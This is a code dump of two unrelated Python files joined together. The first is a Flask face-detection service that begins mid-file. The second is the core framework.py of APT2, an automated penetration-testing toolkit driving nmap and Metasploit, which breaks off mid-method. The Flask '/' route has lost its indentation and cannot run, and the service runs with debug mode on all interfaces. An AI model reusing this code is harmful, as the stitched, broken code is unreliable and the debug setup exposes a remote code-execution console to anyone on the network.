from detection.face_detection_ov import FaceDetectionConfig, OpenMZooFaceDetection, FaceDetectionModelTypes, MtCNNFaceDetection, MTCNNFaceDetectionConfig
from detection.age_gender_detection_ov import AgeGenderConfig, MTCNNAgeGenderDetection, AgeGenderDetectionTypes, MTCNNAgeGenderConfig, AgeGenderDetection
from utils.image_utils import ImageUtil
app = Flask(__name__)
start = int(round(time.time()))
loop = asyncio.get_event_loop()
thread = threading.Thread()
class AppStatus:
    """String constants describing the inference service's lifecycle state."""
    STARTED = "STARTED"
    FINISHED = "FINISHED"
    NOTSTARTED = "NOTSTARTED"
    STOPREQUEST = "STOPREQUESTED"  # note: value deliberately differs from the attribute name
def prepare_configs():
    """
    Build the face detection configuration.

    Chooses an MTCNN- or OpenModelZoo-specific config class based on the
    globally selected face_detection_model and populates it from the last
    JSON request body (json_req).
    :return: face detection config
    """
    logging.getLogger(name="inference").log(logging.INFO, "Setting Configurations")
    if face_detection_model == FaceDetectionModelTypes.MTCNN:
        face_infer_cfg = MTCNNFaceDetectionConfig()
    else:
        face_infer_cfg = FaceDetectionConfig()
    face_infer_cfg.read_dict(json_req)
    logging.getLogger(name="inference").log(logging.INFO, "Configuration Set Completed...")
    return face_infer_cfg
async def inference():
    """Run one inference pass if none is active, then stop the event loop.

    NOTE(review): run_inference() is invoked synchronously, so this coroutine
    blocks the event loop for the entire inference -- confirm that is intended.
    """
    if inference_status == AppStatus.FINISHED or inference_status == AppStatus.NOTSTARTED:
        run_inference()
    else:
        logging.log(logging.WARN, "Inference Already Running ... ")
    loop.stop()
    return "OK"
def run_inference():
    """
    Runs Face Detection Application with the Requested JSON

    Streams video/webcam frames (or a single image) through the selected face
    detector using a small pool of async inference requests, optionally
    drawing ROIs/landmarks and writing text, frame and video artifacts.
    :return:
    """
    face_cfg = prepare_configs()
    # Open the configured input source and grab the first frame.
    if input_type == "video":
        logging.log(logging.INFO, "Video File Input Selected")
        capture = cv.VideoCapture(input_path)
        has_frame, frame = capture.read()
    elif input_type == "webcam":
        logging.log(logging.INFO, "Webcam Video Selected")
        capture = cv.VideoCapture(web_cam_index)
        has_frame, frame = capture.read()
    elif input_type == "image":
        logging.log(logging.INFO, "Single Image Inference Selected")
        frame = cv.imread(input_path)
    else:
        logging.log(logging.ERROR, "Invalid Input Type: {}".format(input_type))
        exit(-1)
    face_cfg.InputHeight = frame.shape[0]
    face_cfg.InputWidth = frame.shape[1]
    logging.getLogger(name="inference").log(logging.INFO, "Input Frame H: {} W: {}".format(face_cfg.InputHeight, face_cfg.InputWidth))
    if face_detection_model == FaceDetectionModelTypes.MTCNN:
        face_infer = MtCNNFaceDetection(face_cfg)
    else:
        face_infer = OpenMZooFaceDetection(face_cfg)
    # Round-robin queues of async inference request ids: "request" holds ids
    # free to submit into, "process" holds ids with results pending.
    face_request_order = list()
    face_process_order = list()
    for i in range(face_infer.Config.RequestCount):
        face_request_order.append(i)
    frame_order = []
    frame_id = 1
    global inference_status
    inference_status = AppStatus.STARTED
    if save_roi_text:
        roi_file = open(output_dir + roi_text_filename, 'w')
        roi = "{};{};{};{};{}\n".format("frameid","xmin","ymin","xmax","ymax")
        roi_file.write(roi)
    if save_roi_video:
        fourcc = cv.VideoWriter_fourcc('X', '2', '6', '4')
        roi_video = cv.VideoWriter(output_dir + roi_video_filename, fourcc, 10, (face_cfg.InputWidth, face_cfg.InputHeight ))
    if input_type == "video" or input_type == "webcam":
        while has_frame:
            if inference_status == AppStatus.STOPREQUEST:
                break
            logging.log(logging.DEBUG, "Processing Frame {}".format(frame_id))
            # Submit the current frame on a free request id, if any.
            if len(face_request_order) > 0:
                req_id = face_request_order[0]
                face_request_order.pop(0)
                face_infer.infer(frame, req_id)
                face_process_order.append(req_id)
                frame_order.append(frame)
            # Collect the oldest pending result once it is ready.
            if len(face_process_order) > 0:
                first = face_process_order[0]
                if face_infer.request_ready(request_id=first):
                    detected_faces = face_infer.get_face_detection_data(first)
                    if face_cfg.ModelType == FaceDetectionModelTypes.MTCNN:
                        face_landmarks = face_infer.get_face_landmarks_data(first)
                    face_process_order.pop(0)
                    face_request_order.append(first)
                    show_frame = frame_order[0]
                    frame_order.pop(0)
                    if len(detected_faces) > 0:
                        for idx, face in enumerate(detected_faces):
                            ImageUtil.draw_rectangle(show_frame, (face[0], face[1], face[2], face[3]))
                            if face_cfg.ModelType == FaceDetectionModelTypes.MTCNN:
                                for coordinate in range(0, len(face_landmarks[idx]), 2):
                                    ImageUtil.draw_ellipse(show_frame, [face_landmarks[idx][coordinate],
                                                                        face_landmarks[idx][coordinate + 1]])
                            if save_roi_text:
                                roi = "{};{};{};{};{}\n".format(frame_id, face[0], face[1], face[2], face[3])
                                roi_file.write(roi)
                        if save_only_frames and not save_roi_video and len(detected_faces) > 0:
                            cv.imwrite(output_dir + roi_frame_filename + "_{}.png".format(frame_id), show_frame)
                        elif save_roi_video:
                            roi_video.write(show_frame)
                    # Required Since
                    face_infer.LastFaceDetections = []
                    face_infer.LastLandmarkDetections = []
            if len(face_request_order) > 0:
                has_frame, frame = capture.read()
                frame_id += 1
    else:
        # Single-image path: one synchronous inference.
        face_infer.infer(frame)
        faces = face_infer.get_face_detection_data()
        if face_cfg.ModelType == FaceDetectionModelTypes.MTCNN:
            landmarks = face_infer.get_face_landmarks_data()
        if len(faces) > 0:
            print("Detected {} Faces with {} Threshold".format(len(faces), face_infer.Config.FaceDetectionThreshold))
            for idx, face in enumerate(faces):
                ImageUtil.draw_rectangle(frame, (face[0], face[1], face[2], face[3]))
                if face_cfg.ModelType == FaceDetectionModelTypes.MTCNN:
                    for coordinate in range(0, len(landmarks[idx]), 2):
                        ImageUtil.draw_ellipse(frame, [landmarks[idx][coordinate], landmarks[idx][coordinate + 1]])
                if save_roi_text:
                    roi = "{};{};{};{};{}\n".format(frame_id, face[0], face[1], face[2], face[3])
                    roi_file.write(roi)
            if save_only_frames:
                cv.imwrite(output_dir + roi_frame_filename + "_{}.png".format(frame_id), frame)
    face_infer.print_inference_performance_metrics()
    inference_status = AppStatus.FINISHED
    # NOTE(review): roi_file/roi_video are only created when save_roi_text /
    # save_roi_video are enabled, but are unconditionally closed/released
    # here -- this raises NameError when either flag is off. Confirm and guard.
    roi_file.close()
    roi_video.release()
# --- Module-level service state and defaults (mutated by the "/" route) ---
inference_status = AppStatus.NOTSTARTED  # current lifecycle state reported by /status
input_type = "image"  # one of "image", "video", "webcam"
input_path = ''  # source file path for image/video input
web_cam_index = 0  # OpenCV capture index when input_type == "webcam"
face_detection_model = FaceDetectionModelTypes.OPENMODELZOO
logfile_name = "log.txt" # "/app/log.txt"
json_req = None  # last JSON request body, consumed by prepare_configs()
output_dir = "./"  # where all ROI artifacts are written
roi_text_filename = "inference_roi.txt"
roi_video_filename = "inference_roi.mp4"
roi_frame_filename = "inference_frame"
save_roi_video = False
save_only_frames = False
save_roi_text = True
@app.route("/", methods=['GET', 'POST'])
def start():
if request.is_json:
# Parse the JSON into a Python dictionary
req = request.json
try:
if req["log_level"] == "DEBUG":
logging.basicConfig(filename=logfile_name,
level=logging.DEBUG,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S')
elif req["log_level"] == "INFO":
logging.basicConfig(filename=logfile_name,
level=logging.INFO,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S')
elif req["log_level"] == "WARN":
logging.basicConfig(filename=logfile_name,
level=logging.WARN,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S')
else:
logging.basicConfig(filename=logfile_name,
level=logging.ERROR,
filemode='a',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S')
logging.log(logging.WARN, "Log Level Set to: {}".format(req["log_level"]))
global input_path
input_path = req["input_path"]
logging.log(logging.WARN, "Input Path: {}".format(req["input_path"]))
global input_type
input_type = req["input_type"]
logging.log(logging.WARN, "Input Type: {}".format(req["input_type"]))
global web_cam_index
web_cam_index = int(req["web_cam_index"])
logging.log(logging.WARN, "Web Cam {}".format(req["web_cam_index"]))
global face_detection_model
if req['face_detection_model'] == FaceDetectionModelTypes.MTCNN:
face_detection_model = FaceDetectionModelTypes.MTCNN
logging.log(logging.WARN, "Face Detection Model {}".format(req["face_detection_model"]))
global save_roi_video
if req["save_roi_video"] == "True":
save_roi_video = True
global save_only_frames
if req["save_only_frames"] == "True":
save_only_frames = True
global save_roi_text
if req["save_roi"] == "False":
save_roi_text = False
res = make_response(jsonify({"message": "INFERENCE STARTED"}), 200)
global json_req
json_req = req
#threading.Thread(target=run_inference()).start()
# Start Async Thread
logging.log(logging.WARN, "Starting Inference ...")
task = loop.create_task(inference())
if not loop.is_running():
loop.run_forever()
else:
logging.log(logging.WARN, "Thread Loop Running ...")
return res
except KeyError:
logging.log(logging.ERROR, "Key Not Found Error")
exit(-1)
except Exception as e:
logging.log(logging.ERROR, e.__str__())
exit(-1)
# Return a string along with an HTTP status code
else:
# The request body wasn't JSON so return a 400 HTTP status code
return "Request was not JSON", 400
@app.route("/status", methods=["GET"])
def status():
"""
Get App Status
:return:
"""
logging.log(logging.WARN, "STATUS CALLED")
return jsonify(inference_status), 200
@app.route("/stop_inference", methods=["POST"])
def stop_inference():
"""
Get App Status
:return:
"""
global inference_status
inference_status = AppStatus.STOPREQUEST
logging.log(logging.WARN, "STOPPING INFERENCE ... ")
return jsonify(inference_status), 200
@app.route("/logs", methods=["GET"])
def logs():
"""
Show Logs
:return:
"""
with open(logfile_name) as f:
file_content = f.read()
return file_content, 200
@app.route("/results", methods=["GET"])
def results():
"""
Get Latest Results
:return:
"""
roifile = output_dir + roi_text_filename
with open(roifile) as f:
file_content = f.read()
return file_content
@app.route('/play_roi', methods=["GET"])
def play_roi():
    """Redirect the caller to the recorded ROI video artifact."""
    video_location = output_dir + roi_video_filename
    return redirect(video_location)
if __name__ == '__main__':
    # Parse the mandatory listening port from the command line and start Flask.
    parser = optparse.OptionParser(usage="python3 /app/face_detection_service.py -p ")
    parser.add_option('-p', '--port', action='store', dest='port', help='The port to listen on.')
    (args, _) = parser.parse_args()
    if args.port is None:
        print("Missing required argument: -p/--port")
        sys.exit(1)
    # threaded=True lets /status and /stop_inference be served while an
    # inference request is being processed; debug=True enables the reloader.
    app.run(host='0.0.0.0', port=int(args.port), debug=True, threaded=True)
framework.py | import argparse
import imp
import os
import re
import sys
# import our libs
from utils import Utils, Display
from keystore import KeyStore as kb
from events import EventHandler
from mynmap import mynmap
from mymsf import myMsf
from threading import RLock, Thread
from keyeventthread import KeyEventThread
class Framework():
    """Core APT2 engine.

    Discovers and loads input/action/report modules, parses the command
    line and config file, and drives the interactive menu / scan loop.
    """

    def __init__(self):
        self.display = Display()
        self.modulelock = RLock()
        self.inputModules = {}
        self.actionModules = {}
        self.reportModules = {}
        self.progName = "APT2"
        self.version = "error"
        self.isRunning = True  # Conditional to check if user wants to quit
        self.inputs = {}
        self.config = {}
        self.config["outDir"] = os.getcwd() + "/"
        self.config["reportDir"] = ""
        self.config["logDir"] = ""
        self.config["proofsDir"] = ""
        self.config["tmpDir"] = ""
        self.config["miscDir"] = ""
        self.config['lhost'] = Utils.getIP()
        self.setupDirs()
        # initialize some config options
        self.config["config_filename"] = ""
        # default all bool values to False
        self.config["verbose"] = False
        self.config["always_yes"] = False
        self.config["list_modules"] = False
        self.config["scan_target"] = None
        self.config["scan_target_list"] = None
        self.config["safe_level"] = 4
        self.config["exclude_types"] = ""
        # make temp file for the KB save file
        self.kbSaveFile = self.config["proofsDir"] + "KB-" + Utils.getRandStr(10) + ".save"
        self.threadcount_thread = None
        self.keyevent_thread = None
        self.allFinished = False

    # ==================================================
    # SUPPORT METHODS
    # ==================================================

    # ----------------------------
    # Setup Directories
    # ----------------------------
    def setupDirs(self):
        """Create the output directory tree and record each path in config."""
        for subdir, key in (("reports/", "reportDir"),
                            ("logs/", "logDir"),
                            ("proofs/", "proofsDir"),
                            ("tmp/", "tmpDir"),
                            ("misc/", "miscDir")):
            path = self.config["outDir"] + subdir
            if not os.path.isdir(path):
                os.makedirs(path)
            self.config[key] = path
            if key == "logDir":
                # route Display logging into the freshly created log dir
                self.display.setLogPath(path)

    # ----------------------------
    # Check the current Version
    # ----------------------------
    def versionCheck(self):
        """Read the local VERSION file and record the version string.

        The remote (GitHub) comparison this method once performed has been
        disabled; only the local VERSION file is consulted.  Any failure
        (missing/unparsable file) aborts via cleanup().
        """
        try:
            pattern = r"'(\d+\.\d+\.\d+[^']*)'"
            # Get the version that is local
            with open('VERSION') as version_file:
                self.version = re.search(pattern, version_file.read()).group(1)
        except Exception:
            # was a bare except:; narrowed while preserving the abort behavior
            self.cleanup()
        return

    # ----------------------------
    # CTRL-C display and exit
    # ----------------------------
    def ctrlc(self):
        """Handle a keyboard interrupt: announce it and shut down."""
        self.display.alert("Ctrl-C caught!!!")
        self.cleanup()

    # ----------------------------
    # Close everything down nicely
    # ----------------------------
    def cleanup(self):
        """Stop helper threads, restore the terminal, and exit the process."""
        # kill key press thread if it has been set up
        if self.keyevent_thread:
            self.keyevent_thread.stop()
        # kill thread count thread
        EventHandler.kill_thread_count_thread()
        # fix prompt
        os.system("stty echo")
        # exit
        sys.exit(0)

    # ----------------------------
    # Display the Banner
    # ----------------------------
    def displayBanner(self):
        """Print the ASCII-art banner and version information."""
        self.display.output()
        self.display.output(" dM. `MMMMMMMb. MMMMMMMMMM ")
        self.display.output(" ,MMb MM `Mb / MM \ ")
        self.display.output(" d'YM. MM MM MM ____ ")
        self.display.output(" ,P `Mb MM MM MM 6MMMMb ")
        self.display.output(" d' YM. MM .M9 MM MM' `Mb ")
        self.display.output(" ,P `Mb MMMMMMM9' MM ,MM ")
        self.display.output(" d' YM. MM MM ,MM' ")
        self.display.output(" ,MMMMMMMMb MM MM ,M' ")
        self.display.output(" d' YM. MM MM ,M' ")
        self.display.output("_dM_ _dMM_MM_ _MM_MMMMMMMM ")
        self.display.output()
        self.display.output()
        self.display.output("An Automated Penetration Testing Toolkit")
        self.display.output("Written by: Adam Compton & Austin Lane")
        # BUGFIX: "Verion" typo in user-facing string
        self.display.output("Version: %s" % self.version)

    # ----------------------------
    # Parse CommandLine Parms
    # ----------------------------
    def parseParameters(self, argv):
        """Parse command-line arguments into self.config and self.inputs.

        NOTE(review): argv is accepted but argparse reads sys.argv
        directly; left unchanged to avoid altering caller behavior.
        """
        parser = argparse.ArgumentParser()
        # ==================================================
        # Input Files
        # ==================================================
        filesgroup = parser.add_argument_group('inputs')
        filesgroup.add_argument("-C",
                                metavar="<config.txt>",
                                dest="config_file",
                                action='store',
                                help="config file")
        filesgroup.add_argument("-f",
                                metavar="<input file>",
                                dest="inputs",
                                default=[],
                                action='store',
                                help="one or more input files separated by spaces",
                                nargs='*')
        filesgroup.add_argument("--target",
                                metavar="",
                                dest="scan_target",
                                action='store',
                                help="initial scan target(s)")
        # ==================================================
        # Advanced Flags
        # ==================================================
        advgroup = parser.add_argument_group('advanced')
        advgroup.add_argument("--ip",
                              metavar="<local IP>",
                              dest="lhost",
                              default=Utils.getIP(),
                              action='store',
                              help="defaults to %s" % Utils.getIP())
        # ==================================================
        # Optional Args
        # ==================================================
        parser.add_argument("-v", "--verbosity",
                            dest="verbose",
                            action='count',
                            default=0,  # explicit 0 avoids None comparisons in loadConfig
                            help="increase output verbosity")
        parser.add_argument("-s", "--safelevel",
                            dest="safe_level",
                            action='store',
                            default=4,
                            help="set min safe level for modules. 0 is unsafe and 5 is very safe. Default is 4")
        parser.add_argument("-x", "--exclude",
                            dest="exclude_types",
                            action="store",
                            default="",
                            help="specify a comma separated list of module types to exclude from running")
        parser.add_argument("-b", "--bypassmenu",
                            dest="bypass_menu",
                            action='store_true',
                            help="bypass menu and run from command line arguments")
        # ==================================================
        # Misc Flags
        # ==================================================
        miscgroup = parser.add_argument_group('misc')
        miscgroup.add_argument("--listmodules",
                               dest="list_modules",
                               action='store_true',
                               help="list out all current modules and exit")
        # parse args
        args = parser.parse_args()
        # convert parameters to values in the config dict
        self.config["config_filename"] = args.config_file
        self.config["verbose"] = args.verbose
        self.config["list_modules"] = args.list_modules
        self.config["scan_target"] = args.scan_target
        self.config["safe_level"] = int(args.safe_level)
        self.config["exclude_types"] = args.exclude_types
        self.config['lhost'] = args.lhost
        self.config["bypass_menu"] = args.bypass_menu
        # bucket each input file by its detected report type
        for f in args.inputs:
            ftype = self.idFileType(f)
            if ftype:
                if ftype in self.inputs:
                    self.inputs[ftype].append(f)
                else:
                    self.inputs[ftype] = [f]

    # ----------------------------
    # Load config setting from the config file
    # ----------------------------
    def loadConfig(self):
        """Merge config-file settings underneath the command-line settings.

        Command-line values take precedence over file values (same result
        as the old py2-only dict(temp2.items() + temp1.items()) merge).
        """
        # does config file exist?
        if (("config_filename" in self.config) and (self.config["config_filename"] is not None)):
            defaults = Utils.loadConfig(self.config["config_filename"])
            merged = dict(defaults)
            merged.update(self.config)  # CLI values win
            self.config = merged
        else:
            # guess not.. so try to load the default one
            if Utils.isReadable("default.cfg"):
                self.display.verbose("a CONFIG FILE was not specified... defaulting to [default.cfg]")
                defaults = Utils.loadConfig("default.cfg")
                merged = dict(defaults)
                merged.update(self.config)
                self.config = merged
            else:
                # someone must have removed it!
                self.display.error("a CONFIG FILE was not specified...")
                self.cleanup()
        # set verbosity/debug level
        if ("verbose" in self.config):
            if (self.config['verbose'] >= 1):
                self.display.enableVerbose()
            if (self.config['verbose'] > 1):
                self.display.enableDebug()
        if not self.config["lhost"]:
            self.display.error("No IP was able to be determined and one was not provided.")
            self.display.error("Please specify one via the [--ip <ip>] argument.")
            self.cleanup()

    # ----------------------------
    # Load Initial Events
    # ----------------------------
    def populateInitEvents(self):
        """Fire the bootstrap event that kicks off always-run modules."""
        EventHandler.fire("always:initial")

    # ----------------------------
    # look for and load any modules (input/action/report)
    # ----------------------------
    def loadModules(self):
        """Walk modules/{input,action,report} and load every module found.

        Returns a dict keyed by (stripped) module name describing each
        module.  Consolidates the three previously copy-pasted walk loops.
        """
        module_dict = {}
        for mod_type in ("input", "action", "report"):
            path = os.path.join(sys.path[0], 'modules/' + mod_type)
            for dirpath, dirnames, filenames in os.walk(path):
                # remove hidden files and directories
                filenames = [f for f in filenames if not f[0] == '.']
                dirnames[:] = [d for d in dirnames if not d[0] == '.']
                for filename in [f for f in filenames if (f.endswith('.py') and not f == "__init__.py")]:
                    module = self.loadModule(mod_type, dirpath, filename)
                    if module is not None:
                        module_dict[module['name'].rstrip(" ")] = module
        return module_dict

    # ----------------------------
    # check to see if the module is of an exclude module type
    # ----------------------------
    def checkExcludeTypes(self, types):
        """Return True if any of the module's types is in the exclude list."""
        excluded = self.config["exclude_types"].split(',')
        return any(t in excluded for t in types)

    # ----------------------------
    # load each module
    # ----------------------------
    def loadModule(self, type, dirpath, filename):
        """Import a single module file and register it with the framework.

        Returns a descriptor dict for the module list, or None if the
        import failed.  (Param name `type` kept for caller compatibility.)
        """
        module_dict = {}
        mod_name = filename.split('.')[0]
        mod_dispname = '/'.join(re.split('/modules/' + type + "/", dirpath)[-1].split('/') + [mod_name])
        mod_loadname = mod_dispname.replace('/', '_')
        mod_loadpath = os.path.join(dirpath, filename)
        mod_file = open(mod_loadpath)
        try:
            # import the module into memory
            imp.load_source(mod_loadname, mod_loadpath, mod_file)
            # find the module and make an instance of it
            _module = __import__(mod_loadname)
            _class = getattr(_module, mod_name)
            _instance = _class(self.config, self.display, self.modulelock)
            reasons = []
            valid = True
            for r in _instance.getRequirements():
                if r == 'disable':
                    reasons.append("Module Manually Disabled !!!")
                    # BUGFIX: a manually disabled module previously still
                    # loaded because valid was never cleared here
                    valid = False
                elif not r in self.config:
                    path = Utils.validateExecutable(r)
                    if path:
                        self.config[r] = path
                    else:
                        reasons.append("Requirement not met: %s" % r)
                        valid = False
            module_dict = {'name': mod_name.ljust(25),
                           'description': _instance.getTitle().ljust(40),
                           'type': type.ljust(6),
                           'valid': valid}
            if type == 'action':
                module_dict['safelevel'] = _instance.getSafeLevel()
            else:
                module_dict['safelevel'] = None
            # add the module to the framework's loaded modules
            if valid:
                if type == "action":
                    if self.config["safe_level"] > _instance.getSafeLevel():
                        reasons.append("Safety_Level (%i) is below requirement: %i" % (_instance.getSafeLevel(), self.config["safe_level"]))
                    elif self.checkExcludeTypes(_instance.getTypes()):
                        # excluded by module type; intentionally skipped
                        # (was a bare `True` no-op statement)
                        pass
                    else:
                        self.actionModules[mod_dispname] = _instance
                        for t in _instance.getTriggers():
                            EventHandler.add(_instance, t)
                elif type == "input":
                    self.inputModules[mod_dispname] = _instance
                elif type == "report":
                    self.reportModules[mod_dispname] = _instance
            if reasons:
                self.display.error('Module \'%s\' disabled:' % mod_name)
                for r in reasons:
                    self.display.error(' ' + r)
        except ImportError as e:
            # notify the user of missing dependencies
            self.display.error('Module \'%s\' disabled. Dependency required: \'%s\'' % (mod_name, e))
            return None
        except Exception as e:
            # notify the user of errors
            print(e)
            self.display.error('Module \'%s\' disabled.' % (mod_name))
            return None
        finally:
            # BUGFIX: the module file handle was never closed
            mod_file.close()
        return module_dict

    # ----------------------------
    # Attempt to identify the type of input file
    # ----------------------------
    def idFileType(self, filename):
        """Sniff the head of a file to guess its scan-report type.

        Returns "nexpose_simple", "nexpose", "nessus", "nmap" or "".
        NOTE(review): binary read + str operations assumes Python 2
        semantics; on Python 3 the data would need decoding.
        """
        # load and read first 4096 bytes of file
        with open(filename, 'rb') as f:
            # BUGFIX: was read(4086); the comment (and intent) say 4096.
            # The `with` also fixes a leaked file handle.
            data = f.read(4096)
        # get first line of the chunk
        firstline = data.split('\n', 1)[0]
        # check firstline
        if (firstline.find("<NeXposeSimpleXML") != -1):
            return "nexpose_simple"
        elif (firstline.find("<NexposeReport") != -1):
            return "nexpose"
        elif (firstline.find("<NessusClientData>") != -1):
            return "nessus"
        elif (firstline.find("<?xml") != -1):
            # it's xml, check for root tags we can handle
            for line in data.split('\n'):
                parts = re.findall(r"<([a-zA-Z0-9\-\_]+)[ >]", line)
                for part in parts:
                    if part == "nmaprun":
                        return "nmap"
        return ""

    # ----------------------------
    # Main Menu
    # ----------------------------
    def displayMenu(self):
        """Show the interactive main menu (or bypass straight to a scan)."""
        if (self.config["bypass_menu"]):
            # Skip first trip through menu and go straight into a scan
            # using whatever arguments were passed
            self.runScan()
            self.isRunning = False
            return
        # fix prompt, sometimes input disappears
        os.system("stty echo")
        self.display.output()
        self.display.output("---------------------------------------")
        self.display.output()
        self.display.output("1. Run")
        self.display.output("2. NMAP Settings")
        self.display.output("3. Browse KB")
        self.display.output("4. Quit")
        self.display.output()
        try:
            userChoice = int(self.display.input("Select an option: "))
            print("[" + str(userChoice) + "]")
            if (userChoice == 1):
                # Execute scan and begin process
                self.runScan()
            elif (userChoice == 2):
                # Configure NMAP Scan Settings
                self.displayNmapMenu()
            elif (userChoice == 3):
                # Browse data in the KB
                self.displayKbMenu()
            elif (userChoice == 4):
                # Quit
                self.isRunning = False
            else:
                self.display.error("%s - Not a valid option" % (userChoice))
        except ValueError:
            self.display.error("Not a valid option")

    # ----------------------------
    # Begin a Scan
    # ----------------------------
    def runScan(self):
        """Run the initial nmap scan (if configured) and drive the event loop."""
        if (self.config["scan_target"]):
            nm = mynmap(self.config, self.display)
            nm.run(target=self.config["scan_target"], ports=self.config["scan_port_range"],
                   flags="-s" + self.config["scan_type"] + " " + self.config["scan_flags"],
                   vector="nmapScan", filetag="nmapScan" + self.config["scan_target"])
        elif (self.config["scan_target_list"]):
            nm = mynmap(self.config, self.display)
            nm.run(target="", ports=self.config["scan_port_range"],
                   flags="-s" + self.config["scan_type"] + " " + self.config["scan_flags"] + " -iL " + self.config["scan_target_list"],
                   vector="nmapScan")
        # begin main loop
        self.keyevent_thread = KeyEventThread(self.display)
        self.keyevent_thread.start()
        while not EventHandler.finished() or not self.allFinished:
            if (EventHandler.finished() and not self.allFinished):
                EventHandler.fire("allFinished")
                self.allFinished = True
            if not self.keyevent_thread.isPaused():
                EventHandler.processNext(self.display, int(self.config['max_modulethreads']))
            # kb.save(self.kbSaveFile)
        # scan is done, stop checking for keypresses in case we go back to the menu
        self.keyevent_thread.stop()

    # ----------------------------
    # Configure NMAP Scan Settings
    # ----------------------------
    def displayNmapMenu(self):
        """Interactive sub-menu for tweaking the nmap scan settings."""
        while True:
            self.display.output()
            self.display.output("---------------------------------------")
            self.display.output()
            self.display.output("Current NMAP Settings: ")
            self.display.output("Scan Type: %s" % (self.config["scan_type"]))
            self.display.output("Flags: %s" % (self.config["scan_flags"]))
            self.display.output("Port Range: %s" % (self.config["scan_port_range"]))
            self.display.output("Target: %s" % (self.config["scan_target"]))
            self.display.output("Target List: %s" % (self.config["scan_target_list"]))
            self.display.output("Set: (s)can type, extra (f)lags, (p)ort range, (t)arget, target (l)ist, (m)ain menu")
            self.display.output()
            userChoice = self.display.input("Choose An Option: ")
            if userChoice == "s":
                self.config["scan_type"] = self.display.input("Choose S, T, U, ST, SU, TU: ")
            elif userChoice == "f":
                self.config["scan_flags"] = self.display.input("Set Extra Flags (ex: -A -Pn -T4): ")
            elif userChoice == "p":
                self.config["scan_port_range"] = self.display.input("Enter Range (1-65535): ")
            elif userChoice == "t":
                self.config["scan_target"] = self.display.input("Enter Target or Range (X.X.X.X/Y): ")
                # target and target-list are mutually exclusive
                self.config["scan_target_list"] = None
            elif userChoice == "l":
                filePath = self.display.input("Enter File Path (/tmp/targets.txt): ")
                if Utils.isReadable(filePath):
                    self.config["scan_target"] = None
                    self.config["scan_target_list"] = filePath
                else:
                    self.display.error("Unable to read file")
            elif userChoice == "m":
                break
            else:
                self.display.error("%s - Not a valid option" % (userChoice))

    # ----------------------------
    # Browse Knowledgebase
    # ----------------------------
    def displayKbMenu(self):
        """Interactive browser over the knowledge-base tree."""
        searchString = ""
        depth = 0
        searches = {0: ""}
        self.display.output()
        self.display.output("---------------------------------------")
        self.display.output("Browse Knowledgebase")
        results = {}
        while True:
            self.display.output("[ " + searchString + " ]")
            if (searchString != ""):
                results = kb.get(searchString)
                i = 0
                for option in results:
                    self.display.output(str(i) + ". " + option)
                    i += 1
            else:
                self.display.output()
                self.display.output("0. host")
                self.display.output("1. service")
                self.display.output("2. domain")
                results = ["host", "service", "domain"]
                i = 3  # Keep selection filter from breaking
            self.display.output()
            self.display.output(
                "Choose From Above Or: (a)dd, (d)elete, (b)ack, (m)ain menu, (i)mport, write to (t)emp file")
            self.display.output()
            search = self.display.input("Select option or enter custom search path: ")
            if search == "m":
                break
            elif search == "b":
                if depth > 0:
                    depth -= 1
                    searchString = searches[depth]
            elif search == "a":
                text = self.display.input("Input new record: ")
                # '/' is the KB path separator, so escape it in user text
                kb.add(searchString + "/" + text.replace("/", "|"))
            elif search == "d":
                choice = self.display.input("Choose record to remove: ")
                try:
                    if int(choice) in range(i):
                        kb.rm(searchString + "/" + results[int(choice)])
                    else:
                        self.display.error("%s - Not a valid option" % (choice))
                except ValueError:
                    self.display.error("Not a valid option")
            elif search == "i":
                self.display.error("Not implemented yet")
            elif search == "t":
                tempPath = self.config["tmpDir"] + "KBRESULTS-" + Utils.getRandStr(10) + ".txt"
                text = ""
                for line in results:
                    text = text + line + "\n"
                Utils.writeFile(text, tempPath)
                self.display.output("Results written to: %s" % (tempPath))
            elif re.match(r"([a-zA-Z0-9.\*]*/)+([a-zA-Z0-9.\*]*)", search) is not None:
                # Input in form of a/b/c/d, search keystore
                searchString = search
                depth = 0
                searches[depth] = searchString
            else:
                try:
                    if int(search) in range(i):
                        if searchString == "":
                            searchString = results[int(search)]
                        else:
                            searchString = searchString + "/" + results[int(search)]
                        depth += 1
                        searches[depth] = searchString
                    else:
                        self.display.error("%s - Not a valid option" % (search))
                except ValueError:
                    self.display.error("%s - Not a valid option" % (search))

    def msfCheck(self):
        """Test to see if we can connect to the Metasploit msgrpc interface"""
        msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                    password=self.config['msfpass'])
        if not msf.isAuthenticated():
            self.display.error(
                "Could not connect to Metasploit msgrpc service with the following parameters:")
            self.display.error(" host = [%s]" % (self.config['msfhost']))
            self.display.error(" port = [%s]" % (self.config['msfport']))
            self.display.error(" user = [%s]" % (self.config['msfuser']))
            self.display.error(" password = [%s]" % (self.config['msfpass']))
            self.display.alert(
                "If you wish to make use of Metasploit modules within APT2, please update the config file with the "
                "appropriate settings.")
            self.display.error("Connect by launching msfconsole and then issue the following command:")
            self.display.error(" load msgrpc User=" + self.config['msfuser'] + " Pass=" + self.config['msfpass'] + " ServerPort=" + self.config['msfport'])
            self.display.output()

    def modulesLoaded(self):
        """Print Loaded Module Stats"""
        self.display.output("Input Modules Loaded:\t%i" % len(self.inputModules))
        self.display.output("Action Modules Loaded:\t%i" % len(self.actionModules))
        self.display.output("Report Modules Loaded:\t%i" % len(self.reportModules))

    def additionalInfo(self):
        """Print Additional Information such as knowledge base path and current IP address"""
        self.display.output()
        self.display.alert("The KnowledgeBase will be auto saved to : %s" % self.kbSaveFile)
        self.display.alert("Local IP is set to : %s" % self.config['lhost'])
        self.display.alert(
            " If you would rather use a different IP, then specify it via the [--ip <ip>] argument.")

    # ==========================================================================================
    # ==========================================================================================
    # ==========================================================================================

    # ----------------------------
    # Primary METHOD
    # ----------------------------
    def run(self, argv):
        """Top-level driver: parse args, load everything, loop the menu, report."""
        #os.system('clear')
        self.parseParameters(argv)
        self.versionCheck()  # check the local version
        self.displayBanner()  # Print banner first and all messages after
        self.loadConfig()  # load config
        modules_dict = self.loadModules()  # load input/action modules
        self.modulesLoaded()
        if self.config["list_modules"]:
